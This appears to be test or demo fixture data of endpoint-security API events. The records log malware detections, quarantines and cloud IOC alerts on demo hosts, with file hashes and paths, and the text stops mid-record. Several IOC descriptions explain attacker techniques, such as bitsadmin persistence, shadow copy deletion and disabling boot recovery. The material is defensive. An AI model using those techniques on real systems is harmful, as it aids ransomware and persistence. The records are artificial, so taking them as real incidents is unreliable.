-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837","sha1":"128aa78059540cf0cdae2a3cea30cd80e00f2046","md5":"c877b67a5733c59d0d8ed8d519df0c91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533243623469744000,"timestamp":1610619329,"timestamp_nanoseconds":596000000,"date":"2021-01-14T10:15:29+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT657.tmp","file_path":"\\\\?\\C:\\BIT657.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"SqGGuYXyy.exe","file_path":"\\\\?\\C:\\SqGGuYXyy.exe","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT4BBF.tmp","file_path":"\\\\?\\C:\\BIT4BBF.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739875754000,"timestamp":1610618750,"timestamp_nanoseconds":875739000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.","short_description":"W32.WScriptExecuteFakeExtension.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739868158500,"timestamp":1610618750,"timestamp_nanoseconds":868146000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.","short_description":"W32.Bitsadmin.ioc"},"file":{"disposition":"Clean","file_name":"bitsadmin.exe","file_path":"/C:/Windows/System32/bitsadmin.exe","identity":{"sha256":"838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00"},"parent":{"disposition":"Clean","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739846959000,"timestamp":1610618750,"timestamp_nanoseconds":846943000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.","short_description":"W32.WScriptLaunchedZippedJS.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576726048000300,"timestamp":1610618696,"timestamp_nanoseconds":48000000,"date":"2021-01-14T10:04:56+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618696,"start_date":"2021-01-14T10:04:56+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"/C:/windows/system32/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576727672000300,"timestamp":1610618689,"timestamp_nanoseconds":672000000,"date":"2021-01-14T10:04:49+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610618689,"start_date":"2021-01-14T10:04:49+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.","short_description":"W32.BCDEditDisableRecovery.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/windows/system32/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458617561791000300,"timestamp":1610618620,"timestamp_nanoseconds":791000000,"date":"2021-01-14T10:03:40+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618620,"start_date":"2021-01-14T10:03:40+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"A file containing a benign extension prior to the .exe extension was executed. This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.","short_description":"W32.FakeExtensionExec.RET"},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"/c:/users/rsteadman/downloads/report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":423000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9C0A7193","detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"l3ghakfl.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\l3ghakfl\\l3ghakfl.dll","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"},"parent":{"process_id":6748,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":423000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9C0A7193","detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"l3ghakfl.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\l3ghakfl\\l3ghakfl.dll","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"},"parent":{"process_id":6748,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":423000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Threat 